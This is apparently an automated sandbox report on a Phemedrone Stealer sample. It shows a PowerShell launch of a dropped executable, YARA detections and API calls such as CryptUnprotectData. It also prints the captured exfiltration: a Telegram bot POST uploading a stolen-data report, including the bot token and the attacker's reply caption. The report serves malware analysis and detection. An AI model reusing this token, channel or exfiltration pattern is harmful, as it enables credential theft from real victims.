                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlakeSXxQgUpdC6ZlueOat1eF5bVjCT%2BJMMoCVqNVFVv2OfaQWqH5HXXnXAarEbeYYRvQNPc3HMwsU39C8%2FJXpVtB9otO%2Fn%2FTIAyqLqjAjtZdwV%2BGTxrkhy3wrQdoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Server: cloudflare
                                                            CF-RAY: 8dd34f6bcbe82cc6-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1726&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=690&delivery_rate=1795412&cwnd=251&unsent_bytes=0&cid=8b23f7b6cc676abd&ts=238&x=0"
                                                            2024-11-04 08:42:21 UTC268INData Raw: 31 35 66 0d 0a 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22
                                                            Data Ascii: 15f{"timezone":"America\/Chicago","ip":"173.254.250.69","organization":"AS8100 ASN-QUADRANET-GLOBAL","asn":8100,"city":"Killeen","organization_name":"ASN-QUADRANET-GLOBAL","country_code":"US","country":"United States","continent_code":"NA","area_code":"
                                                            2024-11-04 08:42:21 UTC90INData Raw: 54 65 78 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 33 31 2e 30 30 36 35 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 39 37 2e 38 34 30 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 7d 0a 0d 0a
                                                            Data Ascii: Texas","latitude":"31.0065","longitude":"-97.8406","accuracy":20,"country_code3":"USA"}
                                                            2024-11-04 08:42:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 149.154.167.220 | 443 | 7560 | C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:42:25 UTC | 384 | OUT | POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                            Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332ca
                                                            Host: api.telegram.org
                                                            Content-Length: 239842
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
2024-11-04 08:42:26 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 38 32 62 32 33 33 33 32 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5a 7d 33 ae c7 9c 5a 60 0d 0e fe f0 9e 06 58 7b e5 6d 69 a4 a5 b4 7c a6 98 83 14 e7 10 56 ae 69 29 14 b7 dd 93 ee 32 f7 9d 1e fc e5 2e 30 17 3a 0e 47 ec 1b c2 be 53 88 5d 1f e2 c5 54 02 f1
                                                            Data Ascii: ------------------------------8dcfc82b23332caContent-Disposition: form-data; name="document"; filename="[US]173.254.250.69-Phemedrone-Report.phem"Content-Type: application/octet-streamZ}3Z`X{mi|Vi)2.0:GS]T
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 32 29 2c 34 4a 4c a5 4f ad ad 7e a1 e2 83 f0 a0 88 80 8f 87 c1 6d d3 68 09 18 c9 ce b3 9a 7f 0c bd 39 91 69 83 4b d5 bc 63 2d 77 1d 29 8f 2b 97 91 63 c4 5f 32 69 05 78 2d d9 24 d1 c4 4f eb 9b 2d 7b 84 a3 08 c6 da 69 77 c8 5e bf 90 49 44 f0 fc 2d d9 31 34 86 6d 6e b2 4b d4 64 5d 8b 44 a0 d4 8f 24 08 ae 80 f9 e2 18 56 f3 9c 08 b9 02 1f 8a f4 f8 8c b8 5d 92 19 ef 31 4d 13 57 09 39 02 4c 0f 74 70 fd cc dd e1 b4 06 97 3c be 51 d0 8f 46 2e 13 56 e4 d8 f6 f5 91 8d 35 40 d6 2f b7 28 1e db 24 48 60 bb c1 77 01 37 b0 56 aa df 1d 3e 4a 8f 90 0a 5f fe 82 09 fb be 52 a7 8c a0 79 e5 e7 be 43 fa ef 8a a8 95 66 ab cd 0c 2c c2 f9 f1 c8 d8 5b a2 80 67 73 ad 16 ae 28 83 05 47 53 31 ea 47 7c 97 6b 96 8a 95 98 68 54 7a d2 ed 10 87 5f 5c f7 fb 4e 87 67 87 8b 59 90 37 48 7f a9
                                                            Data Ascii: 2),4JLO~mh9iKc-w)+c_2ix-$O-{iw^ID-14mnKd]D$V]1MW9Ltp<QF.V5@/($H`w7V>J_RyCf,[gs(GS1G|khTz_\NgY7H
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: da 49 9b f1 32 56 50 05 44 de f6 13 6d c7 84 9a 8c 4d e5 3c 41 8a 26 af af e7 90 99 a3 56 d1 c4 d0 7a b5 df 24 16 8f 8b 15 07 cf 07 aa a0 56 f4 a6 c8 ce 3b b7 96 ce 2f c0 2b 21 ef 0b 74 30 5d 2e 78 31 cd 03 e6 b9 c1 22 08 19 b5 b4 b5 b9 51 57 de f9 5c 34 73 67 ac a8 e5 8c dc 06 6a 41 45 65 f6 63 75 b9 8b 81 b1 d1 60 b4 0d 9a 44 f0 50 96 89 2d 82 ae 2d 95 9c 15 0d a0 2c c4 fc c9 29 a4 c6 18 d5 a8 f7 eb ba da 4f c0 fc 28 9a 1c 37 fc db 11 5e 68 27 13 a1 06 c9 97 42 a4 52 13 a1 a2 8f 6d bc 33 99 1d 4f 33 78 2d 69 fa 0f 40 40 85 52 5c 77 d1 29 c3 9b c2 ad d9 d2 70 83 29 8a 4b 8d 4b e2 36 92 02 ab 88 3f a6 00 d1 46 7a ac 2d 1c d3 da 59 0b 2b f3 6e 40 09 0b 00 5c 91 5c 24 c6 82 6b 6e 50 c5 ae 03 b6 a1 96 8e 39 57 72 40 be b6 52 c3 b3 21 ce a7 da d3 ea 39 5e b6
                                                            Data Ascii: I2VPDmM<A&Vz$V;/+!t0].x1"QW\4sgjAEecu`DP--,)O(7^h'BRm3O3x-i@@R\w)p)KK6?Fz-Y+n@\\$knP9Wr@R!9^
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: 66 0c 33 88 9e 75 5c b7 cf 6e 26 03 fc 13 c3 80 69 8b 51 6c 3e 7f d4 8f 09 e3 45 14 06 63 ca 28 f1 57 10 0b aa fd 64 1c 03 72 81 1f 30 68 18 21 f1 c5 7d e8 2b 0e 84 f8 13 d1 d6 d9 49 77 c7 3e 55 04 d7 42 a2 e2 ab 22 7a 53 7a 4e b5 6a 32 ac 3c b6 56 8a f3 1e 25 a1 83 69 26 5e ac fc ce 47 ee 5b f8 88 5f db f4 7f e0 28 5e 09 28 61 50 2f 82 a7 c9 6e 28 ce 24 06 ca 52 c6 93 9b f5 05 34 91 2e dd 3c 53 7a 87 71 62 a2 a0 d4 d6 ff df 82 77 f5 4c a2 55 1a b1 fd 63 3a dd 54 71 37 8b 2c 02 f4 ef 0e 88 ef 90 69 1c fe 39 5e ba 2c 62 ad 4e d7 ce a6 9f a3 96 1f bb ba 4e 66 be b4 9b 92 ac 65 37 7a c9 57 0a bc fb 0a 71 b2 7c 8e 37 83 3c a0 94 f8 0c f6 da ad a6 58 44 05 9d 85 f0 57 3a 0a c7 0c 2b a5 47 e2 73 2c ea d3 b6 80 d1 27 13 ce 61 67 ac 86 65 e2 86 6d 3e d8 93 01 e6
                                                            Data Ascii: f3u\n&iQl>Ec(Wdr0h!}+Iw>UB"zSzNj2<V%i&^G[_(^(aP/n($R4.<SzqbwLUc:Tq7,i9^,bNNfe7zWq|7<XDW:+Gs,'agem>
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: f1 62 8c 0f 54 5c 13 fa 85 1d 2c fb 99 41 77 03 fc 64 87 a0 7f a2 e8 87 8d b0 eb 58 88 dd ba fd 96 63 f5 a4 3b ad 06 70 c1 15 bd 2b 4c a4 98 59 14 7e 4e f8 d0 32 46 09 52 7c a1 85 6b fb b2 86 59 6a 82 a4 f3 4f 6b 04 4f 49 83 3d d5 50 58 b6 1f 79 24 c2 2d 26 1d 6c 0e 7b a4 db 1d 36 52 e3 28 3a 59 66 76 85 0d f3 ba fa e1 a0 78 75 d8 c5 97 cf e5 57 1c 03 74 df ff 50 94 ed f8 ad 84 ec f1 03 47 b6 2c 95 8f a1 3b 9e fa fb bf e2 a3 71 d2 10 f8 6d 4b b6 af 5c 90 f9 1d a8 95 14 50 a5 93 15 cd 3e 8a 91 eb a6 f3 84 69 f8 6a 7c 91 cd 2f dd 90 22 64 48 10 f5 19 46 01 7d 74 dd 63 49 8e 3f ee e4 fb 77 67 29 e2 80 c2 09 18 b8 06 d6 4c 31 92 85 29 88 fc 2f 4e e2 17 b8 6a 1e 55 db 37 8a bf da 6c 26 62 12 94 66 d2 a9 f9 be c8 6a 77 b9 88 a7 bc 57 02 08 6f 8c 13 04 f4 c8 2f
                                                            Data Ascii: bT\,AwdXc;p+LY~N2FR|kYjOkOI=PXy$-&l{6R(:YfvxuWtPG,;qmK\P>ij|/"dHF}tcI?wg)L1)/NjU7l&bfjwWo/
                                                            2024-11-04 08:42:26 UTC145OUTData Raw: 9d ba 2a 8e 70 a4 31 d5 60 f6 9e 72 b1 a0 35 44 aa ba 8c 94 c9 3d 06 de f1 07 91 ca ea 9d a9 86 ae 7f 7d 71 ed 2d e3 36 6d 73 fa 2d e0 ea 98 3b be 2c dc 47 a8 a0 64 43 84 ca ab 34 ac b0 3f 5f ab 8e 7d be 51 bc 1b 2e 9a 94 3a f9 16 cd b8 44 7b ef 86 27 e9 fa 6a d6 74 c1 ec 8e 9f e8 d8 4f df 56 7d 8f 3b f0 90 40 5a f0 92 0f 65 0a f5 8a 5b c5 55 09 7b 0b b8 0d ec d4 8d 8a 77 60 28 3f 28 9f b8 70 ed 46 51 22 52 90 b4 16 69 2c 3c 96 db
                                                            Data Ascii: *p1`r5D=}q-6ms-;,GdC4?_}Q.:D{'jtOV};@Ze[U{w`(?(pFQ"Ri,<
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: e4 16 d8 21 38 9e 93 f0 fd 07 05 8b c4 45 25 89 85 16 7d 2b 95 ce 6d ac 35 60 bf 26 c5 8a 2a 0b 1c c4 22 63 4f da ab 3f e2 6e 28 2d d8 37 58 bf 69 20 e0 53 51 de ce d1 4a 36 12 e9 c6 fd 9e cd 91 dc b1 ca 41 eb a8 46 fe 4d 50 8b e4 cc 62 df 36 c7 0a 6b fe 24 29 39 45 b3 57 32 f5 86 a6 9a c2 2e 3e f8 3f 97 bf d8 36 50 38 f2 34 38 a1 5f 21 da ba 49 56 28 07 47 55 d2 8a 7b 60 ee 9f 55 34 63 0e 2b 0a f5 24 e4 fc f5 f6 d2 21 fe a2 8f 86 78 1b d3 8a f8 c0 50 c2 fb 8e 3b 11 a8 94 d0 d3 8f a3 5d 71 4a d6 99 5f c8 12 32 e8 d4 c0 72 54 97 9e e8 94 06 39 7c 8f ff 2b 49 d3 bc f9 3b 06 6a ce 26 66 70 5f 23 dd 3c cd c8 67 31 55 22 7e a6 58 73 fe 15 9f 44 1b 81 cc 15 ce ea de 75 f8 73 43 30 28 52 0f 02 0a 71 74 20 a7 bb c0 4e 0f 08 dc aa dc d1 25 ba c5 c4 35 44 ca 5d 08
                                                            Data Ascii: !8E%}+m5`&*"cO?n(-7Xi SQJ6AFMPb6k$)9EW2.>?6P848_!IV(GU{`U4c+$!xP;]qJ_2rT9|+I;j&fp_#<g1U"~XsDusC0(Rqt N%5D]
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: e6 33 fb 78 dc 7d ed e9 78 fb ea 95 4e 54 c4 71 96 f3 ca 79 80 e0 cc 86 fa 9e 88 88 45 50 48 70 0c 81 f5 48 96 95 49 7d 19 c1 28 a0 a1 ba 92 3a cb 8b f1 da 09 46 af 4e 7a ca 6c 74 2a f4 ee 9f f5 9b fe 0a 3c fb 54 85 49 90 6e 7c 33 3d 73 b0 55 c5 01 cf 8f d4 9c a4 4c 37 69 c7 93 5a db e0 f4 4b 1f d3 21 ed 70 fe 67 b8 5b 50 e6 5d 78 e6 69 b4 d8 d8 3c 1a 5a 64 ed a1 a5 b5 18 c8 7c 8f 25 26 b0 dc d2 d1 a1 f7 2b 86 f4 0d 2f 92 20 c1 b6 d1 ae 5f a1 88 fa af 1a e4 75 24 5a 42 6c af e3 52 a7 03 ca 4c dd 3e c4 e7 fc 26 cb dc 3d 86 c8 5a ed 45 48 11 e7 73 b1 1f c5 d3 a1 d1 6c 43 8d 00 51 b0 a5 a5 b4 43 00 ed 1c c9 3f fb d6 ac be 83 08 62 33 5a 1e 6c 4c c9 2a 0f 23 2a 7f 9e f9 3e 12 27 35 b5 ba 88 67 aa 4d 25 d6 c3 67 46 8d cc 0f c1 06 f6 87 9a a5 17 e6 f7 2c 4e 39
                                                            Data Ascii: 3x}xNTqyEPHpHI}(:FNzlt*<TIn|3=sUL7iZK!pg[P]xi<Zd|%&+/ _u$ZBlRL>&=ZEHslCQC?b3ZlL*#*>'5gM%gF,N9
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: a7 b3 54 87 f5 1c 7c 3a e0 f8 9f e3 d3 04 fe 58 83 15 84 35 db d3 9e e3 19 68 58 84 6d d5 28 f3 1e 4c 73 0d 80 44 7d d6 a0 a9 af c5 2e 7d 7f c5 b6 b5 bf fb 95 67 97 00 2a 5b 9f 84 34 b3 74 78 10 9e 65 ac 36 5f 71 94 3b cc 54 63 e1 2f 20 46 90 7c ee d8 f6 33 ae d8 a8 ed b9 3e 50 a8 48 28 c5 ee ad 50 f4 c4 bb ae 7f 3b 68 e5 77 c1 9a db 14 fc 52 3f d1 b4 aa 95 57 5f 14 5c 48 a5 39 49 ec b6 bd 76 20 1b db 94 1f 0d b5 66 4d 7f f4 0b e1 4d 91 f5 b4 8d 10 94 c2 92 35 9f 40 7e e9 af e6 53 12 79 26 9c 34 63 2c 7c 47 4c 94 4f 6c 35 7b dd 65 89 e7 0a a5 52 c0 f8 05 e7 d5 20 81 74 d1 cf b4 7e f2 16 8a 3f a0 ed 82 77 b6 af 12 bb da cd a9 72 08 f7 c8 83 c1 b3 8c f7 0b 26 e6 76 f8 78 a5 e5 50 12 13 78 a0 99 98 bd cd 05 94 d7 a5 e2 05 71 86 da 6b 38 70 99 8d 2e 2c ea ca
                                                            Data Ascii: T|:X5hXm(LsD}.}g*[4txe6_q;Tc/ F|3>PH(P;hwR?W_\H9Iv fMM5@~Sy&4c,|GLOl5{eR t~?wr&vxPxqk8p.,
                                                            2024-11-04 08:42:26 UTC16355OUTData Raw: d7 d3 aa 3e c4 ec ac 90 34 c0 83 09 9a e7 e5 90 e7 89 2e de 68 e0 be 38 df 98 b0 3a ff 53 25 84 d1 09 5e 3e b9 a9 5e f5 07 66 31 e5 e3 bb 4d bf 0d 70 35 8f a2 a5 d1 c1 12 7d 2f 88 c5 38 35 fd aa df 4a 38 1a 3c bd 5d c7 66 cc c1 5b d8 6c 3e 2a 2c 9b 93 e2 fc 89 e6 fa 8c d3 d3 10 e1 71 67 ec 1d db d8 03 89 5c 59 59 c3 ce 77 2a 0c 5a 5d 98 36 11 22 6a da 28 68 78 53 09 90 e6 28 44 b1 73 dc f2 09 eb c1 a0 9a c4 24 c7 11 bb e1 5c 59 b1 55 34 78 44 30 d4 ab 74 60 98 09 0b b8 70 c8 3c 21 c3 e0 76 a7 60 40 18 e9 9b 08 dd 20 82 6c 59 67 61 a5 a5 95 28 18 99 b7 21 8f ab f3 38 0b 33 81 8f c1 8d 53 b4 66 02 b2 02 01 c2 90 a4 26 36 25 d4 e0 a5 d3 81 9b 8c 62 ad 80 42 82 c2 fd 07 91 ad f7 16 ce af b9 4f 5a c2 35 29 6b 96 f8 f0 3b c6 f7 65 37 9c 2c 8b ab 1e 10 3d 6e 24
                                                            Data Ascii: >4.h8:S%^>^f1Mp5}/85J8<]f[l>*,qg\YYw*Z]6"j(hxS(Ds$\YU4xD0t`p<!v`@ lYga(!83Sf&6%bBOZ5)k;e7,=n$
2024-11-04 08:42:26 UTC | 1263 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Mon, 04 Nov 2024 08:42:26 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 875
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":true,"result":{"message_id":271,"from":{"id":8091768794,"is_bot":true,"first_name":"phstl","username":"phstlbot"},"chat":{"id":-4536956662,"title":"phstl","type":"group","all_members_are_administrators":true},"date":1730709746,"document":{"file_name":"[US]173.254.250.69-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBD2coiPJQF4lS8f5hVIYO9dZr4d2kAAIWbQACb2FASXUbBEmhaymFNgQ","file_unique_id":"AgADFm0AAm9hQEk","file_size":239072},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.69 (United States)\n - Tag: video (Vosilyn)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}



                                                            Target ID:0
                                                            Start time:03:42:13
                                                            Start date:04/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:03:42:13
                                                            Start date:04/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:03:42:19
                                                            Start date:04/11/2024
                                                            Path:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y
                                                            Imagebase:0x2747d930000
                                                            File size:240'640 bytes
                                                            MD5 hash:0FF0576F91E4F548CA0D223462B2586C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 68%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:14.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:8.1%
                                                              Total number of Nodes:37
                                                              Total number of Limit Nodes:0
execution_graph (rendered call-graph figure; the recoverable node labels are the API calls LoadLibraryA, CreateFileW, SetFileInformationByHandle and CryptUnprotectData reached from code at 0x7ffb4b4f0000-0x7ffb4b510000)

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID: `{XK$`{XK
                                                              • API String ID: 834300711-4200264577
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: FileHandleInformation
                                                              • String ID:
                                                              • API String ID: 3935143524-0